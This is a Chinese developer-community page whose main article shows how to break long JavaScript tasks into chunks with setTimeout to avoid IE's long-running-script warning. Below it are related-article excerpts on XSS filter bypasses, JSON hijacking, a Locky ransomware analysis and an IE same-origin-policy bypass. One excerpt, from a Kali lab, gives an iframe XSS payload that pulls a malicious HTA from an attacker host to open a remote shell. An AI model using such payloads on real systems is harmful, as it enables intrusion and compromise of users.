开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

使用setTimeout绕过IE的长时间运行脚本警告

使用setTimeout绕过IE的长时间运行脚本警告是一种常见的前端开发技巧，它可以将耗时的任务分解为多个小任务，并在每个小任务之间插入一定的延迟，以避免触发IE浏览器的长时间运行脚本警告。

以下是一个使用setTimeout绕过IE长时间运行脚本警告的示例代码：

function longRunningTask() {
  // 耗时任务的代码
}

function runLongRunningTask() {
  var start = new Date().getTime();
  while (new Date().getTime() - start < 1000) {
    // 循环执行耗时任务
    longRunningTask();
  }
  setTimeout(runLongRunningTask, 100);
}

runLongRunningTask();

在这个示例中，我们将耗时任务的代码封装在longRunningTask函数中，并在runLongRunningTask函数中使用while循环来执行这个任务。在每次循环结束后，我们使用setTimeout函数来延迟100毫秒，然后再继续执行下一次循环。这样，我们就可以避免触发IE浏览器的长时间运行脚本警告。

需要注意的是，使用setTimeout绕过IE的长时间运行脚本警告并不是一种最佳实践，因为它可能会导致页面响应缓慢或者出现其他问题。在实际开发中，我们应该尽量优化我们的代码，以减少脚本的执行时间，并避免触发IE浏览器的长时间运行脚本警告。

相关搜索:如何使用setTimeout监视长时间运行的函数的进度长时间运行的 Powershell 脚本冻结长时间运行的脚本导致500错误。日志中仅显示不相关的警告长时间运行的远程脚本( PHP到Python)运行jQuery/AJAX的PHP脚本需要很长时间使用shell脚本终止oracle db的长时间运行的多个会话在长时间运行的脚本中使用praw时，我需要睡眠吗？如何使用servlet运行长时间运行的进程 PHP警告导致脚本在运行FastCGI的IIS上暂停在长时间运行的流程中跟踪警告/错误的最佳做法是什么？一次多个活动的XMLHttpRequests？长时间运行脚本？为什么这个简单的Flask脚本花了这么长时间运行？使用Python脚本运行完全独立的powershell脚本使用setTimeout的jQuery函数动画正在运行一次使用REST实现长时间运行搜索的最佳实践运行2 2GB的MySQL脚本需要花费很长时间使用Google Cloud Functions的长时间运行的python进程 IE8 setInterval和setTimeout在49天的正常运行时间后立即触发无法使用Bootstrap运行的Tampermonkey脚本使用php脚本运行html的命令

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

使用Django和FastCGI管理长时间运行的过程

问题背景：有一个Django+FastCGI的应用程序，需要修改以执行长时间的计算（可能长达半小时或更久）。需要在后台运行计算，并返回“您的作业已启动”类型的响应。...在进程运行期间，进一步访问该URL应返回“您的作业仍在运行”，直到作业完成，此时应返回作业结果。以后任何对该URL的访问都应返回缓存的结果。...对Django不太熟悉，不知道是否有内置的方法来实现想要的功能。尝试通过subprocess.Popen（）启动进程，但除了在进程表中留下一个失效的条目之外，它工作正常。...需要一个干净的解决方案，可以在进程完成后删除临时文件和进程的任何痕迹。也尝试了fork（）和线程，但还没有想出可行的解决方案。想知道对于看似很常见的用例，是否存在规范的解决方案。...解决方案：可以使用两种可能的解决方案：调度长时任务到长时任务管理程序（可能是上面提到的Django-Queue-Service）。将结果永久保存，无论是文件还是数据库。

1221 0

使用 XML 内部实体绕过 Chrome 和 IE 的 XSS 过滤器

XML 实体来绕过常用 web 浏览器的 XSS 过滤器，比如Chrome， IE 和 Safari 浏览器。...绕过常用浏览器的 XSS 过滤器 Oracle's eBusiness Suite 12.x 以及更早版本中的 BneApplicationService servlet 存在跨站脚本漏洞，这个最初与外部...回想一下我们最初找到的XXE处理漏洞。尝试使用外部 XML 实体（测试失败，因此并不受XXE攻击影响）之后，它启发我使用内部XML实体绕过 XSS 过滤器。...因此绕过 BneApplicationService 内置的过滤器，我们仅需要内部 XML 实体生成左尖括号即可，因此我们天津一个内部实体叫 xxx ，分配给它尖括号的值: <?...那么我们必须绕过 Chrome 的 XSS 过滤器了。我们同样也可以使用内部XML实体来解决。我们创建 IMG, SRC和error中的one实体。

1.4K10 0

20220517_统计脚本运行过程中使用的时间和运行内存

20220517_统计脚本运行过程中使用的时间和运行内存必须使用/usr/bin/time调用time命令，不能直接使用time命令 (base...status: 0 （一）时间相关 image.png （二）内存相关 image.png （三）IO 相关 image.png （四）统计信息输出到文件如果你希望将 time 统计的信息输出到文件...，可以使用 -o 选项 root@chopin:~$ /usr/bin/time -v -o a.txt sleep 2 统计信息直接保存到了 a.txt，如果你希望统计信息能够追加到文件，可以额外加

6264 0

如何使用Docker构建运行时间较长的脚本

我开发了一个会运行很长时间的构建脚本，这个脚本中包含了很多的步骤。这个脚本会运行1-2个小时。它会从网络下载比较大的文件（超过300M）。后面的构建步骤依赖前期构建的库。...生成脚本的快照使用快照可以帮助构建一个长时运行的脚本。...总的想法是，将一个大的脚本分解为许多小的脚本（我喜欢称之为 scriptlets），并单独运行这些小的脚本，脚本运行后为其文件系统打一个快照（Docker会自动执行此操作）。...具体使用说明可以参考这篇文章。在我的脚本中主要用到WORKDIR、ADD和RUN。ADD命令非常有用因为它可以让你在运行之前将外部文件添加到当前Docker镜像中然后转换成镜像的文件系统。...此外，使用RUN命令要注意，每次运行时它都会导致文件系统有不同的更改。在这种情况下，Docker会发现中间镜像并使用它，但是这将是错误的。RUN命令每次运行时会造成文件系统相同的改变。

1.5K2 0

使用c#的 asyncawait编写长时间运行的基于代码的工作流的持久任务框架

最近我在Dapr 的仓库里跟踪工作流构建块的进展时，深入了解了一下，这个DTFx在Azure 基础设施有大量的应用，现在Dapr团队正在把这个实践抽象成工作流构建块，具体参看https://github.com...推荐大家从这两个仓库可用来学习和生产使用。...这个项目通过更多功能扩展持久任务框架，并使其更易于使用，目前还在开发过程中，尚未达到投入生产的程度。包含了下列这些功能，让你在任何地方都可以运行。...用户界面 BPMN 运行器在示例文件夹中，您可以找到经典书籍《飞行、汽车、酒店》的实现，其中包含补偿问题。...BPMNWorker：一个建立在持久任务之上的实验性 BPMN 运行器。对于给定的问题，还有BookParallel和BookSequentialBPMN 工作流。

7322 0

使用LoadRunner对Tuxedo压力测试simpapp的可运行脚本

阅读更多使用LoadRunner对Tuxedo压力测试simpapp的可运行脚本在这里看到《使用LoadRunner来测试BEA TUXEDO》 http://dev2dev.bea.com.cn.../techdoc/200312107.html 但是里面的脚本却不能用，怪事，于是自己修改了一下，如下，就可以用了：）端口自己修改一下，测试simpapp的。...= "welcome to bea tuxedo . hello yulimin 俞黎敏"; lrt_tuxputenv("WSNADDR=//localhost:9900");//对应WSL的端口

9272 0

当代 Web 的 JSON 劫持技巧

-- script contains: stealme --> Edge PoC stealing undefined variable 如果你在跨域脚本中包含 stealme，你将会看到浏览器弹出了该值的警告...>aa"] --> Edge PoC stealing JSON feeds 所以我们想以前一样代理 __proto__ 属性，使用 UTF-16BE 编码包含脚本，而且响应的字符文本中包含了一个...我要做的就是注入一个带有 UTF-16BE 字符集的脚本，注入至其自身，使其具有编码过的赋值和带有尾部注释的 payload。这将绕过 CSP 策略，其只允许引用同一域下的脚本（主流策略）。...Edge，Firefox 和 IE 在标准模式下似乎也会检查 mime 类型，Chrome 说样式表被解析了，但至少在我的测试中并不会这样。...总结 Edge，Safari 和 Chrome 包含的错误让你可以跨域读取未声明的变量。你可以使用不同的编码绕过 CSP 绕过并窃取脚本数据。

2.4K6 0

LOCKY勒索者新花样：通过PDF投递

所以，一旦双击该PDF文档就会直执行JS脚本将DOCX文档释放到临时目录： ? ? Adobe Reader会调用默认的WORD软件打开，但在高版本种会跳出“包含宏”的告警窗口: ?...该样本的宏使用的混淆的方式也较为新奇：采用Windows1窗体并将关键的字符串保存到个组件的属性中，如关键字符串数组IIIIII保存在Window1.Tas.Tag中，使用“FSUKE”分隔。...这种方式可以绕过不支持窗体的VBA检测引擎，也增加了分析人员的分析时间成本： ? ?...勒索软件的行为大同小异，该EXE样本不再重复分析，但从VIRUSTOTAL的扫描记录来看，多数引擎检无法检测。最后跳出LOCKY勒索者标志的警告图片窗口和IE窗口，很明显的勒索软件特征： ?...总结勒索软件直接的高额利益获取会导致该威胁长时间存在并活跃，而像本次样本修改一种新的投递方式，一方面实现成本极低但对安全厂商的引擎却是功能模块的添加、甚至检测效率降低；另一方面对用户来说新的载体和陌生的告警信息会麻痹用户的警惕性提高感染成功率

8896 0

最新XSS 0day漏洞来袭，影响最新版本IE浏览器（含POC）

安全研究人员近日发现了一个严重的XSS 0day漏洞，该漏洞可影响最新版本的IE浏览器，将用户暴露在被攻击和身份盗窃的危险之中。...漏洞信息该漏洞能够影响完全修复过的IE浏览器，黑客可以利用该漏洞盗取用户的敏感数据（例如登录凭证），并能向浏览器会话注入恶意内容。攻击者利用该XSS漏洞可以绕过同源策略（SOP）。...同源策略在维基百科上的解释为： “该策略允许同一站点（系统、主机名和端口号的组合）页面上的脚本访问彼此的DOM，而没有特定的限制，但阻止访问不同站点上的DOM。”...漏洞POC 上周Deusen公布了一个POC利用，以此演示当用户使用完全修补的IE浏览器访问特定的网页时如何绕过SOP。...下面是绕过IE浏览器中同源策略所使用的代码： function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames

6636 0

客户端的js js脚本的引入 js的解析过程

url中的js 应用用途书签通过协议类型指定url内容为任意字符串，该字符串是会被js解释器运行的js代码，其会被当成单独的一行代码实现。即语句之间必须使用分号作为分割。即，书签的实现。...一般事件会是用户输入，键盘输入，网络活动，运行时间等等。事件驱动的第一个事件，即第一个被执行的事件为load事件。...[endif]--> ie支持条件注释，上方是使用条件注释的，在ie下,将会执行上方的js脚本通过 @_jscript 可以判断是不是ie，因为该变量在ie中圆圆为true 写法如下,用于ie的使用条件注释来写.../*@cc_on @if (@_jscript) // 书写兼容的ie代码，在ie下会被执行， alert("in ie") // 发出警告 @end...// 除了ie之外都会执行 alert("not ie") /*@end @*/ 处理兼容的类和库 exanvas.js 功能测试使用if进行测试，是否实现了怪异模式和标准模式使用标准模式就行了

13.1K8 0

网页调试之debugger原理与绕过

当我们调试JS的时候，时常会遇见无限debugger。无限debugger的原理是什么呢？它在何时触发？如何绕过？...eval配合debugger eval() 函数计算 JavaScript 字符串，并把它作为脚本代码来执行。如果参数是一个表达式，eval() 函数将执行表达式。...例如常见的无限制debugger、配合settimeout延迟debugger、代码混淆+debugger等等。...（经过调试是这样的，如果不准确请自行完善哦） debugger绕过原理 debugger的绕过也很简单，我个人总结共有两种大的方向。它们分别是替换、掠过。其原理都是不让debugger执行。...当然也总结了几种我已知的所有绕过方案。展望如何hook“变量”debugger？如果可以实现那么就可以实现反调试的debugger“通杀”，当然目前我也有在探究此方案。

8.1K7 0

面试官：什么是 EventLoop。你：一脸蒙蔽。看完这篇文章就懂了

>加载外部脚本时，任务是执行它用户移动鼠标时，任务是调度 mousemove 事件并执行处理程序当计划好的时间到了 setTimeout，任务是运行其回调。 ......”的警告。...用例2：进度指示为浏览器脚本分配繁重任务的另一个好处是，我们可以显示进度指示。如前所述，仅在当前运行的任务完成后才绘制对DOM的更改，而不管它花费多长时间。...如果我们使用来将繁重的任务分成几部分 setTimeout，那么更改将被绘制在它们之间。...（尽管与规范相比仍简化了）： 1从宏任务队列中出队并运行最早的任务（例如“脚本”）。

1.1K3 0

Microsoft Edge和IE浏览器同源策略绕过漏洞分析

一、前言最近爆出了IE浏览器和Edge浏览器跨域获取敏感信息的漏洞（绕过同源策略），不过并未被微软承认，于是天融信阿尔法实验室进行了一系列深度测试，看看此漏洞是否真实严重。...1.同源策略同源策略（SOP）是在现代浏览器中实现的安全功能，它限制从一个源加载的Web页面或脚本与来自另一个源的资源交互，从而防止不相关的站点相互干扰。...也就是说，不同源的客户端脚本在没有明确授权的情况下，是不能读写对方资源的。...此时，上图中的弹出的URL不等同于192.168.6.23 这个源，这表明我们已经成功绕过浏览器中的同源策略并访问了应该受限制的资源。但是，这有什么用？...五、结语从测试情况来看，漏洞危害性还是很大的，好在这个刷新的功能会被用户所察觉。所以还是在补丁未修补之前，不要使用IE和Edge浏览器浏览网页和点击不明链接。

1.1K1 0

仿linux系统九宫格屏保程序:js网页版

警告：以下代码由季雨林本人探索写出，经过IE，FireFox，Chrome测试发现Chrome（以及360的极速浏览器）浏览器对于javascript的支持明显胜于其他浏览器，请勿在电脑上长时间开启该页面...，即使是js引擎强大的Chrome也会在运行半小时之后占用满内存，而其他浏览器甚至不能流畅运行，该页面制作初衷是为了仿造一种屏幕保护效果（雨林木风Linux系统：九宫格屏保），页面刚启动时的CPU占用达到顶峰时开始正常速度运行...（200ms切换颜色）代码如下（新建文本文件写入以下代码，然后把该文件的后缀名改成“.html”即可）： <!...id"+indexArray; document.getElementById(idName).style.backgroundColor = colors[indexArray2]; //setTimeout

1.4K1 0

centOS6中使用crontab定时运行执行jar程序的脚本

1、编写一个简单的java程序 public class testshell { public static void main(String[] args) { int count = 0...{ System.out.println("第" + (++count) + "个参数：" + arg); } } } 将上述程序打包放到centOS6中 2、编写shell脚本...jar包所在位置写绝对路径地址 3、编辑定时文件（crontab -e） */1 * * * * /root/Desktop/b.sh 总结以上所述是小编给大家介绍的centOS6中使用crontab...定时运行执行jar程序的脚本，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。...在此也非常感谢大家对ZaLou.Cn网站的支持！如果你觉得本文对你有帮助，欢迎转载，烦请注明出处，谢谢！

8743 0

绕过混合内容警告 - 在安全的页面加载不安全的内容

一年前 Eric Lawrence (aka: Internet Hero) 写了一篇博文很清晰地解释了为什么 IE 的团队允许不提示警告的情况下加载不安全的图像。...所以，它们决定允许图像标签加载一个没有警告的渲染器，除了地址栏右边的小挂锁会消失。这是地址栏在 IE 上加载不安全图片之前和之后的样子。注意主地址栏的安全协议根本不会改变。...这些奇怪的协议被使用者用来加载硬盘中的文件来检测本地文件的存在，如果主页是安全的，他们将有一个大问题：IE 将拒绝解析这些协议。因此不要使用他们的技巧！...强制加载内容所以现在我们知道攻击者的意图，是时候验证他们尝试的技巧了：绕过这些警告。...绕过警告信息为了找到绕过警告信息的方法，我偶然发现了解决方案。我很惊讶，这个技巧是那么基础的东西：在不安全的 iframe 中放一个 document.write 就够了。可能这么简单吗？

3.1K7 0

自动化兼容性检查和解决方案：应用不会再白屏了

'compat' ], // ... }; 设置browserslist：通过使用browserslist配置，你可以确保你的项目在目标浏览器中都能够正常运行，并在开发阶段自动引入相应的polyfill...或进行兼容性警告，从而节省调试时间，提高开发效率，并构建跨浏览器友好的Web应用。...; }); 运行eslint命令来检查代码的兼容性： eslint main.js 如果浏览器版本支持addEventListener，则不会报错。否则，会提示相应的兼容性警告。...'builtin-compat' ], // ... }; 配置检查脚本：在package.json中添加检查脚本： { "scripts": { // ......"compat-check": "eslint --no-eslintrc --ext .js main.js" } } 运行检查脚本： npm run compat-check git提交校验为了确保代码在提交前已经通过了兼容性检查

8593 0

setTimeout和setInterval

setTimeout 和 setInterval setTimeout 和 setInterval，也是浏览器中的内置函数，属于 JavaScript 代码 setTimeout：表示多久之后执行语法...setTimeout(func, time), time 是毫秒可以通过 clearTimeout 函数对 setTimeout 进行取消 setInterval：间隔多长时间循环执行语法 setInterval...(func, time), time 是毫秒可以通过 clearInterval 函数对 setInterval 进行取消一、代码实战新建 html 文件 21-setTimeout.html ，...编写下方程序，运行看看效果吧 <metahttp-equiv="X-UA-Compatible"content="<em>IE</em>

1K2 0

JS魔法堂：初探传说中的setImmediate函数

一、前言　　　　　　　　　　　　　　　　　　　　　　　　　　　　由于JavaScript程序为单线程，因此在执行长时间的操作时（如循环和递归操作）到导致UI线程长期被阻塞，无法响应用户操作请求...于是想到将一个长时间操作切片成N个小操作并异步执行，例如jsDeferred中的 Deferred.repeat函数就提供这样的解决办法，其实质就是通过 setTimeout事件或 script元素...从IE10开始引入了setImmediate接口来代替setTimeout来完成上述功能，下面将记录该接口的资讯，由于内容会涉及到event loop、调用栈等知识，而我对相关内容了解仍不全面，因此下面的内容若有纰漏请各位指正...具体为IE5~8和不插电源的IE9的时间精度为15.6ms，插电源的IE9和其他浏览器则为4ms。 ...我在IE11上操作测试，setTimout的延时为4ms左右，而setImmediate的延时为2ms左右。注意： 1.

1.4K9 0

Kali Linux Web渗透测试手册(第二版) - 5.8 - 使用XSS和Metasploit获取远程shell

第五章、使用跨站脚本攻击客户端 5.0、介绍 5.1、使用浏览器绕过客户端控制 5.2、识别跨站脚本漏洞 5.3、利用XSS获取Cookie 5.4、利用DOM XSS 5.5、利用BeEF执行xss...设置本地监听端口为12345： set lport 12345 show options 5．现在我们运行exploit等待客户端连接： run 注意服务器启动时给出的信息，Local IP给出了访问HTA...(就像是：k0Pjsl1tz2cI3Mm.hta) 6．现在切换到Windows虚拟机，打开IE浏览器 7．假设攻击者发送了一封包含链接的钓鱼电子邮件， http://192.168.56.11/bodgeit...q=t<iframe src="http://192.168.56.10:8888/k0Pjsl1tz2cI3Mm.hta"> 给受害者，在IE中打开它 8．如果你的骗人的手段足够高，...就可以使得用户接受不安全警告下载执行恶意文件： 9．当提示运行、保存或者取消时，选择运行HTA文件 10．现在切换回Kali，你就可以在控制台中看到Metasploit已经成功收到来自客户端的负载请求并且建立了

8534 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭